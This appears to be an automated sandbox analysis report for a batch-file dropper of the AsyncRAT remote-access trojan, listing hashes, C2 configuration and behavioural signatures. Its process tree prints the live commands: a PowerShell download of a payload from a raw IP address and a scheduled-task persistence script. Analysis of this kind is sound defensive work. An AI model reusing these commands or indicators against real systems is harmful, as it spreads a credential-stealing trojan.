Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 10:24
Static task
static1
Behavioral task
behavioral1
Sample
Sat.bat
Resource
win7-20241010-en
General
-
Target
Sat.bat
-
Size
2KB
-
MD5
0e2fff554ddadc58aaff7978ec06aa32
-
SHA1
b453b17905235ea96150c90711285f7879d3afc0
-
SHA256
64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
-
SHA512
c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76
Malware Config
Extracted
http://109.199.101.109:770/xx.jpg
Extracted
asyncrat
AWS | 3Losh
Default
samsalah1.freeddns.org:1005
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 3752 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
AutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exepid process 2056 AutoHotkey64.exe 4896 AutoHotkey64.exe 624 AutoHotkey64.exe 3412 AutoHotkey64.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1320 powershell.exe 3752 powershell.exe 4056 powershell.exe 4848 powershell.exe -
Suspicious use of SetThreadContext 36 IoCs
Processes:
AutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exedescription pid process target process PID 4896 set thread context of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 set thread context of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 4896 set thread context of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 set thread context of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 4896 set thread context of 1116 4896 AutoHotkey64.exe RegAsm.exe PID 624 set thread context of 224 624 AutoHotkey64.exe AppLaunch.exe PID 4896 set thread context of 1680 4896 AutoHotkey64.exe AppLaunch.exe PID 624 set thread context of 3384 624 AutoHotkey64.exe AppLaunch.exe PID 624 set thread context of 2064 624 AutoHotkey64.exe AppLaunch.exe PID 4896 set thread context of 3956 4896 AutoHotkey64.exe AppLaunch.exe PID 4896 set thread context of 4004 4896 AutoHotkey64.exe AppLaunch.exe PID 624 set thread context of 220 624 AutoHotkey64.exe AppLaunch.exe PID 4896 set thread context of 4440 4896 AutoHotkey64.exe aspnet_compiler.exe PID 624 set thread context of 756 624 AutoHotkey64.exe aspnet_compiler.exe PID 4896 set thread context of 4392 4896 AutoHotkey64.exe aspnet_compiler.exe PID 624 set thread context of 1512 624 AutoHotkey64.exe aspnet_compiler.exe PID 624 set thread context of 4556 624 AutoHotkey64.exe aspnet_compiler.exe PID 4896 set thread context of 4820 4896 AutoHotkey64.exe cvtres.exe PID 624 set thread context of 3916 624 AutoHotkey64.exe cvtres.exe PID 4896 set thread context of 3868 4896 AutoHotkey64.exe cvtres.exe PID 624 set thread context of 3660 624 AutoHotkey64.exe cvtres.exe PID 4896 set thread context of 432 4896 AutoHotkey64.exe cvtres.exe PID 624 set thread context of 4272 624 AutoHotkey64.exe cvtres.exe PID 4896 set thread context of 4704 4896 AutoHotkey64.exe cvtres.exe PID 624 set thread context of 4580 624 AutoHotkey64.exe cvtres.exe PID 4896 set thread context of 2544 4896 AutoHotkey64.exe cvtres.exe PID 624 set thread context of 4448 624 AutoHotkey64.exe InstallUtil.exe PID 4896 set thread context of 400 4896 AutoHotkey64.exe InstallUtil.exe PID 624 set thread context of 2548 624 AutoHotkey64.exe InstallUtil.exe PID 4896 set thread context of 3908 4896 AutoHotkey64.exe InstallUtil.exe PID 4896 set thread context of 2816 4896 AutoHotkey64.exe InstallUtil.exe PID 624 set thread context of 3576 624 AutoHotkey64.exe InstallUtil.exe PID 4896 set thread context of 3276 4896 AutoHotkey64.exe InstallUtil.exe PID 3412 set thread context of 3752 3412 AutoHotkey64.exe RegAsm.exe PID 3412 set thread context of 1620 3412 AutoHotkey64.exe RegAsm.exe PID 3412 set thread context of 2648 3412 AutoHotkey64.exe RegAsm.exe -
System Location Discovery: System Language Discovery 1 TTPs 36 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RegAsm.execvtres.exeInstallUtil.exeInstallUtil.exeInstallUtil.exeRegAsm.exeAppLaunch.exeAppLaunch.execvtres.execvtres.exeaspnet_compiler.exeaspnet_compiler.exeaspnet_compiler.exeInstallUtil.exeRegAsm.exeRegAsm.exeAppLaunch.execvtres.exeInstallUtil.exeInstallUtil.exeRegAsm.exeaspnet_compiler.execvtres.execvtres.exeAppLaunch.execvtres.execvtres.execvtres.exeInstallUtil.exeRegAsm.exeRegAsm.exeAppLaunch.exeaspnet_compiler.exeAppLaunch.exeAppLaunch.exeRegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3252 timeout.exe -
Suspicious behavior: EnumeratesProcesses 60 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeAutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exepid process 1320 powershell.exe 1320 powershell.exe 3752 powershell.exe 3752 powershell.exe 4848 powershell.exe 4848 powershell.exe 4056 powershell.exe 4056 powershell.exe 624 AutoHotkey64.exe 624 AutoHotkey64.exe 624 AutoHotkey64.exe 624 AutoHotkey64.exe 624 AutoHotkey64.exe 624 AutoHotkey64.exe 624 AutoHotkey64.exe 624 AutoHotkey64.exe 4896 AutoHotkey64.exe 4896 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 1320 powershell.exe Token: SeDebugPrivilege 3752 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeDebugPrivilege 4056 powershell.exe Token: SeDebugPrivilege 1240 RegAsm.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
AutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exepid process 2056 AutoHotkey64.exe 2056 AutoHotkey64.exe 4896 AutoHotkey64.exe 624 AutoHotkey64.exe 4896 AutoHotkey64.exe 624 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe -
Suspicious use of SendNotifyMessage 8 IoCs
Processes:
AutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exepid process 2056 AutoHotkey64.exe 2056 AutoHotkey64.exe 4896 AutoHotkey64.exe 624 AutoHotkey64.exe 4896 AutoHotkey64.exe 624 AutoHotkey64.exe 3412 AutoHotkey64.exe 3412 AutoHotkey64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.execmd.exeAutoHotkey64.exeAutoHotkey64.exedescription pid process target process PID 2064 wrote to memory of 1320 2064 cmd.exe powershell.exe PID 2064 wrote to memory of 1320 2064 cmd.exe powershell.exe PID 1320 wrote to memory of 2384 1320 powershell.exe cmd.exe PID 1320 wrote to memory of 2384 1320 powershell.exe cmd.exe PID 2384 wrote to memory of 3752 2384 cmd.exe powershell.exe PID 2384 wrote to memory of 3752 2384 cmd.exe powershell.exe PID 2384 wrote to memory of 4848 2384 cmd.exe powershell.exe PID 2384 wrote to memory of 4848 2384 cmd.exe powershell.exe PID 2384 wrote to memory of 3252 2384 cmd.exe timeout.exe PID 2384 wrote to memory of 3252 2384 cmd.exe timeout.exe PID 2384 wrote to memory of 2056 2384 cmd.exe AutoHotkey64.exe PID 2384 wrote to memory of 2056 2384 cmd.exe AutoHotkey64.exe PID 2384 wrote to memory of 4896 2384 cmd.exe AutoHotkey64.exe PID 2384 wrote to memory of 4896 2384 cmd.exe AutoHotkey64.exe PID 2384 wrote to memory of 624 2384 cmd.exe AutoHotkey64.exe PID 2384 wrote to memory of 624 2384 cmd.exe AutoHotkey64.exe PID 2384 wrote to memory of 844 2384 cmd.exe schtasks.exe PID 2384 wrote to memory of 844 2384 cmd.exe schtasks.exe PID 2384 wrote to memory of 4056 2384 cmd.exe powershell.exe PID 2384 wrote to memory of 4056 2384 cmd.exe powershell.exe PID 624 wrote to memory of 4276 624 AutoHotkey64.exe RegAsm.exe PID 624 wrote to memory of 4276 624 AutoHotkey64.exe RegAsm.exe PID 624 wrote to memory of 4276 624 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 884 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 624 wrote to memory of 4200 624 AutoHotkey64.exe RegAsm.exe PID 624 wrote to memory of 4200 624 AutoHotkey64.exe RegAsm.exe PID 624 wrote to memory of 4200 624 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1240 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1292 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 3184 4896 AutoHotkey64.exe RegAsm.exe PID 624 wrote to memory of 4836 624 AutoHotkey64.exe RegAsm.exe PID 624 wrote to memory of 4836 624 AutoHotkey64.exe RegAsm.exe PID 624 wrote to memory of 4836 624 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1116 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1116 4896 AutoHotkey64.exe RegAsm.exe PID 4896 wrote to memory of 1116 4896 AutoHotkey64.exe RegAsm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "3⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak4⤵
- Delays execution with timeout.exe
PID:3252
-
-
C:\Users\Admin\Documents\AutoHotkey64.exe"C:\Users\Admin\Documents\AutoHotkey64.exe"4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2056
-
-
C:\Users\Admin\Documents\AutoHotkey64.exe"C:\Users\Admin\Documents\AutoHotkey64.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:884
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1292
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3184
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:4956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:4880
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4004
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4440
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4392
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵PID:1972
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵PID:2240
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵PID:3340
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4820
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3868
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:432
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4704
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:400
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2816
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3276
-
-
-
C:\Users\Admin\Documents\AutoHotkey64.exe"C:\Users\Admin\Documents\AutoHotkey64.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:4276
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:4200
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:4836
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:2840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:224
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:3300
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:220
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4556
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3660
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4272
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4580
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2548
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:1816
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3576
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:3652
-
-
-
C:\Windows\system32\schtasks.exeschtasks /Query /TN "alosh"4⤵PID:844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "$tr = New-Object -ComObject Schedule.Service; " "$tr.Connect(); " "$ta = $tr.NewTask(0); " "$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; " "$ta.Settings.Enabled = $true; " "$ta.Settings.DisallowStartIfOnBatteries = $false; " "$st = $ta.Triggers.Create(1); " "$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); " "$st.Repetition.Interval = 'PT2M'; " "$md = $ta.Actions.Create(0); " "$md.Path = 'C:\Users\Admin\\Documents\\AutoHotkey64.exe'; " "$ns = $tr.GetFolder('\'); " "$ns.RegisterTaskDefinition('alosh', $ta, 6, $null, $null, 3);"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
-
-
C:\Users\Admin\Documents\AutoHotkey64.exeC:\Users\Admin\\Documents\\AutoHotkey64.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3412 -
